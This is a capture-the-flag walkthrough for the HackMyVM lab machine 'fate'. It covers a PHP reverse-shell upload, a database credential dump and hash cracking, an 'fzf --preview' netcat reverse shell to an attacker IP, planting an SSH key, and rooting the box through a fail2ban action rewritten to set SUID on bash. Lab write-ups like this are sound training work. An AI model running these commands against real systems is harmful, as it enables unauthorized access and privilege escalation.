### Write up for https://hackmyvm.eu/machines/machine.php?vm=fate ### ip=[targetIP] threader3000 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0) | ssh-hostkey: | 3072 61:39:bc:89:db:98:a7:63:15:fe:13:54:01:22:8d:52 (RSA) | 256 bb:a3:b7:24:76:9c:fd:27:8f:13:ef:f5:cf:4f:8b:ab (ECDSA) |_ 256 0c:af:8b:a0:fa:3f:7b:38:52:b4:93:a0:65:da:c0:7c (ED25519) 80/tcp open http nginx 1.18.0 |_http-server-header: nginx/1.18.0 |_http-title: Site doesn't have a title (text/html). 13120/tcp open http Node.js Express framework |_http-title: Gancio Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel feroxbuster -n -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u $url -x php,txt,html,zip,bak,htm,cgi -t 500 -e 301 GET 7l 11w 169c http://$ip/uploads => http://$ip/uploads/ 200 GET 12l 27w 285c http://$ip/index.html 200 GET 1l 8w 0c http://$ip/upload.php 200 GET 12l 27w 285c http://$ip/ Visit $url we see that we can upload file lets try php-reverse-shell nc -lvnp [port] The file revsh.php has been uploaded and renamed to db405464322afaa2bd0fd784b91011b6 $url/uploads/ ----> 403 curl $url/uploads/db405464322afaa2bd0fd784b91011b6 <?php // php-reverse-shell - A Reverse Shell implementation in PHP. Comments stripped to slim it down. RE: https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php // Copyright (C) 2007 pentestmonkey@pentestmonkey.net after a lot of struggling trying both the normal name and the renamed one i tried to upload a new file but run a backround script before uploading (rename your php-revshell) while [[ "$(curl -s -o /dev/null -w ''%{http_code}'' http://$ip/uploads/rev.php)" != "200" ]]; do sleep 5; done nc -lvnp [port] we got shell python3 -c 'import pty;pty.spawn("/bin/bash")' ctrl+z stty -a; stty raw -echo;fg export SHELL=bash export TERM=xterm stty rows (values from stty -a) cols (values from stty -a) find / -perm -u=s 2>/dev/null getcap -r / 2>/dev/null nothing special its linpeas time python3 -m http.server 80 cd /tmp wget <ourip>/linpeas.sh chmod +x linpeas.sh ./linpeas.sh gancio 624 0.1 16.7 946532 167428 ? Ssl 17:10 0:09 node /usr/local/bin/gancio /etc/systemd/system/gancio.service is executing some relative path /etc/systemd/system/multi-user.target.wants/gancio.service is executing some relative path uid=107(gancio) gid=113(gancio) groups=113(gancio) drwxr-xr-x 4 gancio gancio 4096 Feb 16 10:51 gancio -rw-r--r-- 1 gancio gancio 1282 Apr 3 17:10 /tmp/node-jiti/server-initialize.server.js.c8d34e02.js find / -iname gancio 2>/dev/null /var/lib/mysql/gancio /usr/local/bin/gancio /usr/local/share/.config/yarn/global/node_modules/gancio /usr/local/share/.config/yarn/global/node_modules/.bin/gancio /usr/local/share/.cache/yarn/v6/npm-gancio-1.4.0-a5c1a777ef5121604ff781af17417f88e64f3191/node_modules/gancio /usr/local/share/.cache/yarn/v6/npm-gancio-1.4.0-a5c1a777ef5121604ff781af17417f88e64f3191/node_modules/gancio/.bin/gancio /usr/local/share/.cache/yarn/v6/.tmp/01e94e889254727c8b933650006ea644/.bin/gancio /opt/gancio cd /opt/gancio ls -alh total 20K drwxr-xr-x 4 gancio gancio 4.0K Feb 16 10:51 . drwxr-xr-x 3 root root 4.0K Feb 16 10:40 .. -rw-r--r-- 1 gancio gancio 474 Feb 16 10:51 config.json drwxr-xr-x 2 gancio gancio 4.0K Apr 3 17:10 logs drwxr-xr-x 3 gancio gancio 4.0K Feb 16 10:51 uploads cat config.json "log_level": "debug", "log_path": "/opt/gancio/logs", "db": { "dialect": "mariadb", "storage": "", "host": "localhost", "database": "gancio", "username": "******", "password": "******", "logging": false, "dialectOptions": { "autoJsonMap": false mysql -u[username] -p[password] show databases; use gancio show tables; select * from users; get two hashes exit pico hashes add the two hashes john --wordlist=/usr/share/wordlists/rockyou.txt hash you will get only connor's pass ssh connor@$ip sudo -l Matching Defaults entries for connor on fate: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User connor may run the following commands on fate: (john) NOPASSWD: /usr/bin/fzf lets check gtfobins nothing sudo -u john /usr/bin/fzf --help sudo -u john /usr/bin/fzf --preview 'nc <yourip> 1234 -e /bin/bash' nc -lvnp 1234 listening on [any] 1234 ... connect to [192.168.56.1] from (UNKNOWN) [192.168.56.6] 58448 id uid=1001(john) gid=1001(john) groups=1001(john) cd mkdir .ssh chmod 755 .ssh cd .ssh echo "your id_ssh.pub" >> authorized_keys chmod 655 authorized_keys exit ssh john@$ip ls cat user.txt sudo -l User john may run the following commands on fate: (root) NOPASSWD: /usr/bin/systemctl restart fail2ban After some google search i found 2 ways /etc/fail2ban/action.d/iptables-multiport.conf and /etc/fail2ban/action.d/iptables-common.conf The first one didnt work for me. cd /tmp echo "chmod +s /bin/bash" > iptables chmod +x iptables ls -alh /bin/bash -rwxr-xr-x 1 root root 1.2M Aug 4 2021 /bin/bash pico /etc/fail2ban/action.d/iptables-common.conf # Option: iptables # Notes.: Actual command to be executed, including common to all calls options # Values: STRING iptables = iptables <lockingopt> change to iptables = /tmp/iptables <lockingopt> save and close watch -n 0 ls -alh /bin/bash open a new terminal and ssh john2@$ip try few times and you will see -rwsr-sr-x 1 root root 1.2M Aug 4 2021 /bin/bash john@fate:/tmp$ /bin/bash -p bash-5.1# ls /root cat /root/root.txt